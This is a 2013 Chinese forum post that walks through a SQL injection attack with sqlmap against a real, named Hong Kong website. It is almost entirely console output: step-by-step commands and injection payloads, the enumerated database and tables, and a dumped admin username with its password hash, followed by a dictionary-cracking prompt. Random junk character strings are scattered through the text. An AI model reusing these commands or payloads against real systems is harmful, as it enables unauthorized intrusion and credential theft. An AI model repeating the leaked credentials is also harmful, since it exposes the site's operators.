找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2446|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; v5 M0 g3 y3 K3 K2 m/ E/ x5 Mms "Mysql" --current-user       /*  注解:获取当前用户名称
+ d3 v  f. S/ q6 ~    sqlmap/0.9 - automatic SQL injection and database takeover tool
- u, V  U) |  U) }    http://sqlmap.sourceforge.net
  • starting at: 16:53:54. C* m" n7 E; \' J3 m  _0 j' O
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 m( Z1 y' U. f6 w& _
    session file
    1 G( J, d8 v# W4 N! j+ g[16:53:54] [INFO] resuming injection data from session file
    . a- t/ i8 C% K* u! v$ J  B5 o[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    % _6 @" x) R9 A5 {; k; T[16:53:54] [INFO] testing connection to the target url0 O3 f6 ^7 x' C' p
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    7 y7 o9 `: H; G; ~sts:8 w  ~  L1 d, J# Q
    ---" b$ e, \8 F2 h3 I" p4 y# t
    Place: GET  G. W0 p! y# B
    Parameter: id3 |- s- M. `' |1 u; q
        Type: boolean-based blind: I, U% U- l6 }& v4 C
        Title: AND boolean-based blind - WHERE or HAVING clause, f8 T4 T' |; Z3 V) m6 t
        Payload: id=276 AND 799=799
    ' W0 [8 ?# Y! Q+ N7 n+ B1 h6 u    Type: error-based
    7 ?+ j) r- q8 \, F    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    8 E6 b3 C1 Y( ^5 V( i    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,6 M- ?# a" B$ h7 s8 u- m
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ; ~9 r. K9 C$ e5 K$ C),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    + i5 G* s1 W& m$ v( V  B    Type: UNION query- W' N! a7 S4 p* H0 ^+ B0 O9 [
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    0 s+ b" @, m) E6 m    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( M# L* V+ u/ L+ Y
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    5 s, N. G' Y- G/ f8 ^% k$ yCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% c" y. b7 w2 }  P
        Type: AND/OR time-based blind/ ~1 n4 v+ N* }0 ^2 W+ Z
        Title: MySQL > 5.0.11 AND time-based blind" r5 T  x% \  j4 j) {
        Payload: id=276 AND SLEEP(5); ]6 F: z& p7 P1 a
    ---
    6 L! Z6 z$ l, i% T2 }9 R[16:53:55] [INFO] the back-end DBMS is MySQL
    + J& r' r1 Q- Pweb server operating system: Windows
    " E+ N$ s1 |1 [: S  B# o7 ~web application technology: Apache 2.2.11, PHP 5.3.00 Z8 e0 T* C* u8 [1 v6 D( S
    back-end DBMS: MySQL 5.0% V/ \3 S" `9 w, y# E
    [16:53:55] [INFO] fetching current user
    3 f; [9 E% {0 W; E6 V9 P. r) u, Lcurrent user:    'root@localhost'   # X6 f  E! c' h' H- f' O: T5 H
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    & ]( N+ E! ]& N' z1 D; atput\www.wepost.com.hk'
  • shutting down at: 16:53:581 k: v: k; H* @+ F/ O
    - f4 G4 y; X! p' Q6 c3 p
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    + C  P/ ?: J3 E" u8 Pms "Mysql" --current-db                  /*当前数据库
    5 s' _/ g# J, z8 g    sqlmap/0.9 - automatic SQL injection and database takeover tool
    + u" N0 X& z8 d' ^1 Y    http://sqlmap.sourceforge.net
  • starting at: 16:54:165 }% H" `( A1 s) \" N5 q
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 U; e' w! W, R) p  }# v
    session file1 p$ {7 z- H; t+ r& D
    [16:54:16] [INFO] resuming injection data from session file
    1 @' I) f9 y, u[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    3 Q- ^, S) D" m9 g& e$ Q[16:54:16] [INFO] testing connection to the target url5 `5 O+ X; ]8 N0 k  b8 C' v3 K
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
      s5 {- R) p! E( D$ `2 J; Lsts:
    ; p/ d2 C8 M' f- L---; t2 M- g: O! F: T1 D
    Place: GET
    : g) K% g4 m- C" ^7 x. s  r; I% H5 _Parameter: id, K9 |6 F$ `' H
        Type: boolean-based blind
    4 Z4 x8 q5 ~* Q: z8 Q  l    Title: AND boolean-based blind - WHERE or HAVING clause& |# \' Y7 C. r/ e2 O
        Payload: id=276 AND 799=7996 Y8 h. w! V3 g& c
        Type: error-based; J. R5 R, Y, r: [
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause  P3 C  h0 n9 u! V
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ L5 A- }; x6 Z/ p  k0 p8 g* T
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    7 ^/ N. O5 B4 v& _),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    9 Y% Y. x! I- H! X    Type: UNION query
    2 `) W! u3 I- J; [% G9 v    Title: MySQL UNION query (NULL) - 1 to 10 columns
    + `# X0 U9 T2 |4 f    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    2 b9 N8 i0 L# g, V$ ~8 |9 V+ y8 }' L(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 e4 _2 E& ~/ h# F# v  c6 O( D; N& W
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    , P9 Y5 p% z9 G    Type: AND/OR time-based blind5 S/ [. u2 w$ t4 X$ R
        Title: MySQL > 5.0.11 AND time-based blind4 J- J! c% x& Z) U* c! y' J
        Payload: id=276 AND SLEEP(5)/ N+ K& ~& s9 V' l7 w2 \1 ?
    ---; B, t* `& d+ |2 u# G2 X
    [16:54:17] [INFO] the back-end DBMS is MySQL# Q8 L9 y* C$ p+ N3 c
    web server operating system: Windows& v- M% m2 b. |% }9 p+ s, m
    web application technology: Apache 2.2.11, PHP 5.3.06 i# @; a; o7 M7 r$ _. G
    back-end DBMS: MySQL 5.0
    2 w; \" Q4 D# \5 d[16:54:17] [INFO] fetching current database2 E, m5 H8 c0 `! I/ ?# ?$ Z: B
    current database:    'wepost'6 ?6 R' J9 o" I) S5 C0 Z6 L0 D7 g) s
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    % A8 B7 P1 l1 @0 F+ [tput\www.wepost.com.hk'
  • shutting down at: 16:54:18) H2 p3 Z( C6 P7 K- x$ z8 G/ ^
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ M+ Q1 @) z2 a: Y# v
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    ; _6 m- S# {5 U3 ^% D    sqlmap/0.9 - automatic SQL injection and database takeover tool
    ; k7 F9 c  @1 u4 ~" ]  V/ d    http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    9 X& h+ y3 n8 i! V[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    0 a( F# @" E7 F* {5 j session file/ p5 R# _6 Z9 b) R
    [16:55:25] [INFO] resuming injection data from session file
    0 H6 U% f4 Z  f# |( K5 F[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* D- W% W+ T  i" p
    [16:55:25] [INFO] testing connection to the target url3 i) G7 a6 ^: k  r$ ~
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque* Y' i, v' `7 d. V& \
    sts:" O0 m$ n# [! J
    ---
    " r+ A+ ~: y5 }( pPlace: GET
    7 @2 |4 K' L* J) r4 v' R' A+ S! DParameter: id- {' y* m+ M$ l! ?9 f. g
        Type: boolean-based blind& z, u$ J4 R( [+ T* a% V
        Title: AND boolean-based blind - WHERE or HAVING clause
    9 \; ]  R: i$ C! H! |$ T- E( v    Payload: id=276 AND 799=799
    6 w9 I/ P3 X  I- M4 `! M    Type: error-based2 e/ h" z8 s' p6 e/ ^3 @5 F
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    : w# c* e3 M6 i/ ^+ x8 {    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 V7 a1 K4 M" B8 D$ h* {120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" |" U% N) J  |+ C8 A
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    9 g5 s; f# P; ~4 s$ @5 Q* x. T    Type: UNION query
    5 |8 x+ @) G( q' ?    Title: MySQL UNION query (NULL) - 1 to 10 columns8 z* x& H3 l; ~: j
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    " ]: Y% u" K" k, \' O5 n; m(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," f& Y; Q- C# ]2 s6 V2 u
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ n! E6 l) y; K" ^9 d+ s6 ]
        Type: AND/OR time-based blind
    - @8 w! u! u( _6 N    Title: MySQL > 5.0.11 AND time-based blind
    % _) @0 q" p' u7 B# Z    Payload: id=276 AND SLEEP(5)
    # i+ s' Z4 a9 H  o---; c* u' Y& t: a$ g2 R
    [16:55:26] [INFO] the back-end DBMS is MySQL" g. q8 m: R6 P( ?  A- [
    web server operating system: Windows$ g9 r! q, K/ p1 E
    web application technology: Apache 2.2.11, PHP 5.3.0! l$ f8 T3 ^9 E
    back-end DBMS: MySQL 5.08 l, v6 Y7 S1 E9 g
    [16:55:26] [INFO] fetching tables for database 'wepost'
    ) i. {; P3 S5 C4 f" i" d" v[16:55:27] [INFO] the SQL query used returns 6 entries& P- m0 W' B4 V) z- k
    Database: wepost8 `* T1 C: I. a* B# F
    [6 tables]+ W$ n$ D" ?! ~! J" ^
    +-------------+
    : \# R3 [4 P$ Z: n( r8 g3 B| admin       |
    / B+ v$ S& r. ?5 l| article     |
    0 G5 f9 a* Q- d' h  Q; ?$ L: D7 g# p3 e| contributor |9 t- c! X. X+ z2 v% Y3 o
    | idea        |
    + q9 s7 U; F* L8 B! F; B7 t| image       |
    % D) @7 P+ k! J: ]4 e$ || issue       |
    . [- P5 ~8 h- A8 F2 [8 k% P+-------------+
    3 L0 L4 t9 h0 M2 |* W- p$ o[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    # C1 ?/ h: {" o0 M$ m7 xtput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    $ {: g0 R" e! M. K8 d$ n" R# ~
    ' Z. J0 Z5 @6 G* P; xD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db8 n& X: V' u! N' o
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名; _5 M# G2 o: D/ Q$ \# f
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    3 G; V) c' e( ^- ^9 E    http://sqlmap.sourceforge.net
  • starting at: 16:56:06+ g- W- T) |- g" j  h$ J2 A* t
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    ) G' E+ H/ p( c" C; i; Fsts:
    * V4 \8 I, K5 Q6 E3 E6 |& K---( h4 t. v5 d& Q) q- L
    Place: GET: @0 P: D  r2 w/ ]2 K) h
    Parameter: id; l6 A9 p5 J  @( T' z4 E: k; _
        Type: boolean-based blind
    6 M# W% z* @' L$ B    Title: AND boolean-based blind - WHERE or HAVING clause: ?& {' ^4 Y9 q+ Y
        Payload: id=276 AND 799=7991 Y# X) R/ B  [
        Type: error-based
    8 D, q# W) R, n( m1 O( ?    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. G8 R# r6 B0 {) m4 a# `3 T1 I1 [1 N
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,7 z6 F8 d7 c; m) j1 U
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    7 y3 o# X- \9 x- [5 B),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    $ Q: P; y# w3 I2 V    Type: UNION query5 g: x* p* @# s$ u  N
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ) q4 H3 L8 M# u  `    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ; u$ e  M( e2 X( i(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
      l' C% I2 M, qCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ; d1 }' O! N+ X1 v/ C% r    Type: AND/OR time-based blind; W4 e( K1 ?* R& ?1 O8 |
        Title: MySQL > 5.0.11 AND time-based blind
    / G$ Q+ l. q% r, B& ^    Payload: id=276 AND SLEEP(5)+ m1 n  Z# G8 U; B* c. i! F2 X+ J. k
    ---4 I5 ]5 \0 }/ \( i/ T
    web server operating system: Windows3 F( W- r( `4 z- f; u+ J! u% J! J
    web application technology: Apache 2.2.11, PHP 5.3.0' O' k. W8 I/ s+ x. }9 W
    back-end DBMS: MySQL 5.0
      x" h. G+ e* \; Q1 a[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    + f5 m/ J) r. P2 ^! Q% z/ rssion': wepost, wepost$ J2 Z# l$ m9 N1 T, x
    Database: wepost
    9 k* c1 |1 o0 R3 l8 }; j8 l; ^+ N7 y0 ATable: admin
    - \  E0 [/ n6 B+ O5 C[4 columns]9 m& z8 A1 c% r/ N  F
    +----------+-------------+: `& n# A$ r7 x( e9 ~1 E/ ~
    | Column   | Type        |* L, i4 P5 H, p# a- B' G
    +----------+-------------+
    8 v. t+ w5 s1 Y. D: {5 x" C* O, || id       | int(11)     |! _4 y/ T+ w& B4 t* c$ k
    | password | varchar(32) |
    ; I' p$ g) l& L' r! J5 p| type     | varchar(10) |1 m4 g6 K- }" ?- @
    | userid   | varchar(20) |
    4 n8 W. v* a) D# r8 |+----------+-------------+
    , K2 m: `# @5 E) ~+ `& G  E
  • shutting down at: 16:56:19& {/ T- X2 X% j1 m- C2 N1 ]& c. w; D

    3 e& I; Y) R& e, A; \/ F( |D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db% m  ?% i* q: N5 J: \9 A
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容: u  e2 C8 t0 ?; |* V. T% u
        sqlmap/0.9 - automatic SQL injection and database takeover tool; K" d: B! ]+ q
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    3 L+ f: ~2 x6 y; ~  K  Fsqlmap identified the following injection points with a total of 0 HTTP(s) reque" o; A) B4 s+ V/ @/ v% q- V( T3 ~
    sts:( F2 {2 v. ?7 g/ e8 ?
    ---
    ) r* X2 g4 G& `# W( o( f. xPlace: GET
    + A! r2 \3 S% w+ LParameter: id$ R: K5 [2 w" b: A; J
        Type: boolean-based blind& Y/ }) J: E, b6 u. g
        Title: AND boolean-based blind - WHERE or HAVING clause
    % l! q$ v  ^  Z5 o  \# V    Payload: id=276 AND 799=799# r$ w6 z- \- w2 [6 ^7 [/ d
        Type: error-based
    1 T2 Q' }7 ]8 [  R3 A    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    4 I& y, Q2 p# I8 t" w    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% }5 A- y$ ?0 h; R; Z" i( e  d
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 X) f+ j: P/ P& u0 Z- {3 ?
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ; E# I/ T3 T/ p$ y. T: W. F; |; m) Z3 N    Type: UNION query: C  G2 I- n/ {5 f$ w, U9 y
        Title: MySQL UNION query (NULL) - 1 to 10 columns4 @$ v$ W$ A1 \
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ! n- {% q# L& V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ; ?0 M2 N. ~! U5 ?# a1 nCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 ?: m. p9 L& ]
        Type: AND/OR time-based blind
    ( w& ?, T6 f! E9 T0 h2 d    Title: MySQL > 5.0.11 AND time-based blind+ \: P2 }+ N( [. k9 s* W
        Payload: id=276 AND SLEEP(5)
    $ I$ i. D. Y$ w---. U& A% V0 o( B, N# |# r# d
    web server operating system: Windows6 ]7 z1 y3 W7 C! W: I  R
    web application technology: Apache 2.2.11, PHP 5.3.0
    ( y& `5 g, E6 r7 S' g7 P8 Nback-end DBMS: MySQL 5.0; q5 n3 H' ~+ `1 |5 m. `
    recognized possible password hash values. do you want to use dictionary attack o" R, u1 ]3 T3 I' Y  K/ {  L
    n retrieved table items? [Y/n/q] y
    ( P: L& ?& A4 ]7 wwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]$ {. U: _. Z' C9 B+ d7 \7 x
    do you want to use common password suffixes? (slow!) [y/N] y
    ; N, \/ P; _+ n) R, xDatabase: wepost
    $ t5 h7 N+ p/ j. d, ?Table: admin4 X4 N. |' {  v" ?/ U" K+ G
    [1 entry]2 M; f5 ^6 d: i
    +----------------------------------+------------+0 V  h% s' O# V% y) }& V
    | password                         | userid     |% k2 v6 N5 T! \+ R5 Y8 v
    +----------------------------------+------------+3 X) @8 |5 d, ]
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |2 _! V( Q% |# w9 }
    +----------------------------------+------------+. S; Z& D1 I# Y0 _* O& x3 q; B
  • shutting down at: 16:58:14
    ' U. O; t( h! X2 f9 ]4 y* h4 H
    3 _7 z9 h  I4 d$ I( R; e3 kD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表